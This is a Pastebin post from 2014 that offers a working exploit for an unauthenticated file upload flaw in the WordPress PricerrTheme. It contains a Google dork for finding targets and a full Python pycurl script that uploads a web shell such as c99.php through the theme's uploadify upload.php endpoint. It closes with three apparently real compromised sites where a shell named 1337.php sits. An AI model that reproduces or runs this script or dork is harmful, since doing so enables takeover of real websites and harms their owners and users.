API tools faq
paste
Advertisement
1337_Brain

Wordpress Theme PricerrTheme Shell Upload Vulnerability

1337_Brain
Jul 11th, 2014
730
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.87 KB | None | 0 0
raw download clone embed print report
  1. Wordpress Theme PricerrTheme Shell Upload Vulnerability
  2. ############################################################################
  3.  
  4. # Title : Wordpress Theme PricerrTheme Shell Upload Vulnerability
  5.  
  6. # Author : Aloulou
  7.  
  8. # Date : 08/07/2014
  9.  
  10. # Facebook : facebook.com/vorcen
  11.  
  12. # Email: aloulou@alquds.com
  13.  
  14. # Vendor : http://sitemile.com/products/wordpress-pricerr-theme/ ($69.99)
  15.  
  16. # Google Dork : inurl:/wp-content/themes/PricerrTheme
  17.  
  18. # Tested on : Linux
  19.  
  20.  
  21.  
  22. ############################################################################
  23.  
  24.  
  25.  
  26. Exploit:
  27.  
  28. import optparse
  29. import sys
  30. import pycurl
  31. from cStringIO import StringIO
  32. print "#________________________________________________________#"
  33. print "| |"
  34. print "| PricerrTheme Shell Upload Exploit |"
  35. print "| |"
  36. print "| Author:Aloulou |"
  37. print "| Dork: inurl:/wp-content/themes/PricerrTheme |"
  38. print "| Facebook: facebook.com/vorcen |"
  39. print "| Email:aloulou@alquds.com |"
  40. print "| Greeting to Tunisia , AnonBoy & All muslims |"
  41. print "#________________________________________________________#\n"
  42.  
  43. parser = optparse.OptionParser(usage='python %s -t http://site.com -s shellname -p UploadingPath \nExample: python %s -t http://target.com -s c99.php -p /wp-content/uploads' %(sys.argv[0],sys.argv[0]))
  44. parser.add_option('-t', '--target',action="store", dest="target",help="-t http://site.com", default="")
  45. parser.add_option('-s', '--shell',action="store", dest="shellname",help="-s c99.php", default="")
  46. parser.add_option('-p', '--path',action="store", dest="path",help="-p /wp-content/uploads", default="")
  47. options, args = parser.parse_args()
  48. if options.target=="": print ("Type \"python %s -h\" for help"%sys.argv[0])
  49. else:
  50. pth='folder'
  51. shpath=options.path
  52. target=options.target
  53. filename=options.shellname
  54. psd='Filedata'
  55. themename='PricerrTheme'
  56. c = pycurl.Curl()
  57. c.setopt(c.POST, 1)
  58. c.setopt(c.HTTPPOST, [('title', 'test'), ((psd, (c.FORM_FILE, filename)))])
  59. c.setopt(c.VERBOSE, 0)
  60. bodyOutput = StringIO()
  61. headersOutput = StringIO()
  62. c.setopt(c.WRITEFUNCTION, bodyOutput.write)
  63. c.setopt(c.URL, '%s/wp-content/themes/%s/lib/uploadify/upload.php?%s=/%s' %(target,themename,pth,shpath) )
  64. c.setopt(c.HEADERFUNCTION, headersOutput.write)
  65. c.perform()
  66. x=bodyOutput.getvalue()
  67. shname=options.shellname
  68. if "/" in shname:
  69. shname=options.shellname.rsplit('/',1)
  70. if x=="1":
  71. print ('Shell uploaded successfully LINK=%s/%s/%s' %(target,shpath,shname[1]))
  72. else:print("Shell upload Failed!")
  73. else:
  74. shname=options.shellname
  75. if x=="1":
  76. print ('Shell uploaded successfully LINK=%s/%s/%s' %(target,shpath,shname))
  77. else:print("Shell upload Failed!")
  78.  
  79.  
  80.  
  81.  
  82.  
  83.  
  84.  
  85. Examples:
  86.  
  87. http://www.anygigz.com/wp-content/themes/PricerrTheme/1337.php
  88. http://gigpeddler.com/wp-content/themes/PricerrTheme/1337.php
  89. http://www.fiverme.com/wp-content/themes/PricerrTheme/1337.php
  90.  
  91.  
  92.  
  93.  
  94.  
  95. # Greeting to : MzshoHk , Alking Ksa & All muslims
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!